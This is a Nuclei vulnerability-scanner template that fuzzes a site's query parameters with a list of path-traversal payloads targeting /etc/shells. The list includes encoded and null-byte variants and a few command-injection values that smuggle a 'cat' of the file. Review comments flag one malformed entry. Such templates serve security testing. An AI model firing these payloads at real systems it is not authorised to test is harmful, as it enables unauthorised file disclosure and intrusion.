# Nuclei DAST template: sends the fuzz list below as the value of every query
# parameter on {{BaseURL}} and reports a hit when the response body looks like
# the contents of /etc/shells (see the matchers at the bottom).
id: lfi-fuzz

info:
  name: Local File Inclusion
  author: 0x71rex
  severity: high
  tags: lfi,dast,linux

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    payloads:
      # Path-traversal candidates for /etc/shells. All entries are single-quoted
      # so backslashes and %-sequences are kept literally (no YAML escaping).
      nix_fuzz:
        - '/etc/shells'
        - '../../etc/shells'
        - '../../../etc/shells'
        - '/../../../../etc/shells'
        - '../../../../../../../../../etc/shells'
        - '../../../../../../../../etc/shells'
        - '../../../../../../../etc/shells'
        - '../../../../../../etc/shells'
        - '../../../../../etc/shells'
        - '../../../../etc/shells'
        - '../../../etc/shells'
        - '../../../etc/shells%00'
        - '../../../../../../../../../../../../etc/shells%00'
        - '../../../../../../../../../../../../etc/shells'
        - '/../../../../../../../../../../etc/shells^^'
        - '/../../../../../../../../../../etc/shells'
        - '/./././././././././././etc/shells'
        - '\..\..\..\..\..\..\..\..\..\..\etc\shells'
        - '..\..\..\..\..\..\..\..\..\..\etc\shells'
        - '/..\../..\../..\../..\../..\../..\../etc/shells'
        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/shells'
        - '\..\..\..\..\..\..\..\..\..\..\etc\shells%00'
        - '..\..\..\..\..\..\..\..\..\..\etc\shells%00'
        - '%252e%252e%252fetc%252fshells'
        - '%252e%252e%252fetc%252fshells%00'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00'
        - '....//....//etc/shells'
        - '..///////..////..//////etc/shells'
        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells'
        - '%0a/bin/cat%20/etc/shells'
        - '%00/etc/shells%00'
        - '%00../../../../../../etc/shells'
        - '/../../../../../../../../../../../etc/shells%00.jpg'
        - '/../../../../../../../../../../../etc/shells%00.html'
        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shells'
        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
        # NOTE(review): inside a single-quoted scalar a lone ' terminates the
        # string, so this entry ends after the first '\\' and leaves trailing
        # text on the line -- most YAML parsers reject that. An embedded quote
        # must be doubled (''); confirm the intended payload and re-quote it.
        - '\\'/bin/cat%20/etc/shells\\''
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'

    # Where the payloads go: only query-string parameters are fuzzed, and each
    # existing value is replaced rather than appended to.
    fuzzing:
      - part: query
        type: replace  # replaces the existing parameter value with the fuzz payload
        mode: multiple  # replaces every parameter's value with the fuzz payload at once
        fuzz:
          - '{{nix_fuzz}}'

    # Stop after the first payload that matches; keeps request volume per
    # target bounded once a finding is confirmed.
    stop-at-first-match: true
    matchers:
      # All four strings must be present in the response body (condition: and)
      # before a match is reported, which keeps false positives low.
      # NOTE(review): not every /etc/shells lists /bin/ash or carries the
      # "# valid login shells" header line -- confirm the and-condition is
      # intended, as it may miss file reads on some distributions.
      - type: word
        words:
          - "# valid login shells"
          - "/bin/sh"
          - "/bin/ash"
          - "/bin/bash"
        condition: and
        part: body